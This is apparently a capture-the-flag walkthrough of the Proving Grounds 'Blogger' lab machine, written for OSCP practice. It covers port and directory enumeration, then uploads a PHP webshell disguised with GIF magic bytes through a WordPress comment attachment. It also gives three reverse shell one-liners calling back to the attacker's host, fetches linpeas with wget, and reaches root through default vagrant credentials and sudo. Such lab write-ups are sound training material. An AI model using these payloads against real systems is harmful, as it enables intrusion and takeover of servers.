Blogger - Proving Grounds

#OSCP

Enumeration

Let's enumerate all the TCP ports with nmap.
nmap -sCV -p- --min-rate 1000 -v 192.168.171.217
Pasted image 20241008102133.png
I have SSH(port 22) and Apache(port 80) so let's enumerate Apache.

Apache - port 80

http://192.168.171.217
Pasted image 20241008102350.png
I see a Blogger site with some fields on the page and a name called James.
Let's try to findout some hidden subdirectories with gobuster.

Find subdirectories - Gobuster

gobuster dir -w /usr/share/dirb/wordlists/common.txt -u http://192.168.171.217 -x .zip php -b 404,403
Pasted image 20241008102851.png
I will try to access /assets subdirectory.
http://192.168.171.217/assets/fonts/blog/
Pasted image 20241008105247.png
Seems like there is no CSS file so let's add target IP to /etc/hosts.
echo '192.168.171.217 blogger.pg' | sudo tee -a /etc/hosts
http://blogger.pg/assets/fonts/blog/
Pasted image 20241008110125.png
Let's enumerate subdirectories while i search for more information.
gobuster dir -w /usr/share/dirb/wordlists/common.txt -u http://blogger.pg/assets/fonts/blog/ -x .zip php -b 404,403
Pasted image 20241008110734.png
I went to /wp-admin subdirectory and tried to login with default users and the users that i foundout with default passwords but without success.

FootHold

When i was search i foundout a link saying HelloWorld! and it shows a upload file option so i can upload a reverse shell or a webshell.
http://blogger.pg/assets/fonts/blog/?p=1#comment-1
Pasted image 20241008110919.png

Webshell with GIF Magic Bytes

Let's create a webshell and upload it.
nano webshell.php

<?system($_GET['cmd']);?>

I can't upload because it only accepts img type so let's add the magic bytes to the webshell.
Pasted image 20241008111246.png
nano webshell.php

GIF89a;
<?system($_GET['cmd']);?>

Pasted image 20241008111445.png
It uploads but it doesn't work so let's try to change the webshell for <?php echo shell_exec($_GET['cmd']); ?> and let's test it this time.
nano webshell.php

GIF89a;
<?php echo shell_exec($_GET['cmd']); ?>

Now let's execute the command id.
http://blogger.pg/assets/fonts/blog/wp-content/uploads/2024/10/webshell-1728382922.0066.php?cmd=id
Pasted image 20241008112402.png

Execute Reverse Shell from WebShell - Linux

Let's use python3 reverse shell on the webshell to get a connection on listener of my local machine.
nc -lvnp 4444
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.210",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
or
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.210 4444>/tmp/f
or
bash -c 'bash -i >& /dev/tcp/192.168.45.210/4444 0>&1'
Pasted image 20241008112448.png

Privilege Escalation

First let's upgrade to a TTY shell.
python3 -c 'import pty;pty.spawn("/bin/bash");'
Pasted image 20241008112638.png
I got user flag on /home/james directory.
cd /home/james
ls -la
Pasted image 20241008112758.png

Linpeas

Let's transfer Linpeas.sh to target machine and run it.
python3 -m http.server 80
wget http://192.168.45.210/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
Pasted image 20241008113424.png
Pasted image 20241008113627.png
Pasted image 20241008113643.png
I saw SUID but it didn't had nothing interesting.

Unexpected Moment - Change Users

Before we try to access mysql server let's just try to access on james, ubuntu and vagrant.
su james
james
su ubuntu
ubuntu
su vagrant
vagrant
Pasted image 20241008114007.png
Vagrant default credentials it worked.

.bash_history

Let's see what command do i have on this file.
cat .bash_history
Pasted image 20241008114143.png
Pasted image 20241008114155.png
I see that this user runs a su command to get a root shell so i check Sudo commands and i saw that i can use them all.
sudo -l
Pasted image 20241008114318.png
sudo su -
id
Pasted image 20241008114351.png
Let's get root flag.
ls
Pasted image 20241008114411.png